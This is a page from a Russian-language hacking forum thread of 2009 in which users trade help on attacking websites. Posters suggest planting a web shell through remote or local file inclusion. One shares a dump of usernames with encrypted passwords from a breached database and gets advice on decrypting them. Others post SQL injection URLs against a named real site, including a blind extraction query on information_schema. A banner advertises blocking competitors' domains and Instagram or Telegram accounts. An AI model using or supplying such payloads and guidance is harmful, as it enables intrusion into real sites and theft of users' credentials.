Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 737 из 2438

737

Опции темы

Поиск в этой теме

Опции просмотра

#7361

27.05.2009, 10:09

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

С нами: 9837719

Репутация: 466

2 Byrger

если в $t диру а в $f имя файла то можно будет проинклюдить существующий файл.

#7362

27.05.2009, 11:05

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

С нами: 9567480

Репутация: 61

Цитата:

Сообщение от Iceangel_

2 Byrger
[RFI]
заливаешь на фтп шел с именем index.php

или шелл с любым именем, но без расширения

[LFI]

2 Shaitan-Devil
можешь посмотреть сайты по реверс айпи на присутствие локального инклуда, и потом инклуднуть записанный в /tmp шелл

Ошибку 404 типо выводит. Проверка существования файла срабатывает.
Оба способа пробовал

#7363

27.05.2009, 11:28

satana8920

Постоянный

Регистрация: 22.09.2006

Сообщений: 531

С нами: 10333826

Репутация: 369

[0]:webmaster:њyЯu›И§
[1]:administrator:џЊ6г–А¶Ґ2И
[2]:morogoy:¶pР
[3]:dorogoynn:Эxi›лPcх
[4]:anna:NЂ—оB7е
[5]:dorogoy:Уќ=цКі¶э ѓ
вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?

Последний раз редактировалось satana8920; 27.05.2009 в 11:31..

#7364

27.05.2009, 11:38

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

С нами: 10339586

Репутация: 1396

Цитата:

Сообщение от satana8920

вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?

попробуй
AES_DECRYPT(AES_ENCRYPT(
хотя, судя по всему ты юзал СИПТ, и там по умолчанию крипт.

еще варианты:

PHP код:


		
			
cast(Version()+as+binary)

CONVERT(Version(),binary)

convert(version()+using+latin1)  

convert(version()+using+binary)

#7365

27.05.2009, 11:40

satana8920

Постоянный

Регистрация: 22.09.2006

Сообщений: 531

С нами: 10333826

Репутация: 369

да я и unhex(hex())
не помогает а юзал я да сипт
я уж и руками пробовал

$n@ke
перепробовал все ничего не помогло все так же осталось

еще у кого нито варианты будут?

Последний раз редактировалось satana8920; 27.05.2009 в 11:47..

#7366

27.05.2009, 11:53

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

С нами: 9593606

Репутация: 4915

Цитата:

Сообщение от satana8920

еще у кого нито варианты будут?

Будут

Это скорее всего AES_ENCRYPT НО что-бы расшифровать нужен ключ.

Тоесь пароли попросту зашифрованы

Цитата:

Сообщение от satana8920

как исправить?

Узнать ключ и расшифровать. А лучше алгоритм, тк. может быть и самопис, визуально не поймёшь

#7367

27.05.2009, 12:18

satana8920

Постоянный

Регистрация: 22.09.2006

Сообщений: 531

С нами: 10333826

Репутация: 369

jokester
и как вообще этот ключ может выглядеть?
допустим я узнал ключ как это расшифровывать?!

#7368

27.05.2009, 12:29

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

С нами: 9593606

Репутация: 4915

http://www.mysql.ru/docs/man/Miscellaneous_functions.html
AES_ENCRYPT
AES_DECRYPT

Посмотри, думаю всё станет понятно

#7369

27.05.2009, 20:07

DeepXhadow

Познающий

Регистрация: 19.04.2008

Сообщений: 67

С нами: 9505375

Репутация: 19

Помогите...
http://www.aftech.ru/about/news/?nid=999999+UNION+SELECT+1,222,3,4,5,6,7,8,9--

Unknown column 'news_datetime' in 'order clause'
Как это обойти?

#7370

27.05.2009, 20:38

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

С нами: 9288132

Репутация: 571

Код:

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))%3E1--

Страница 737 из 2438

737

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход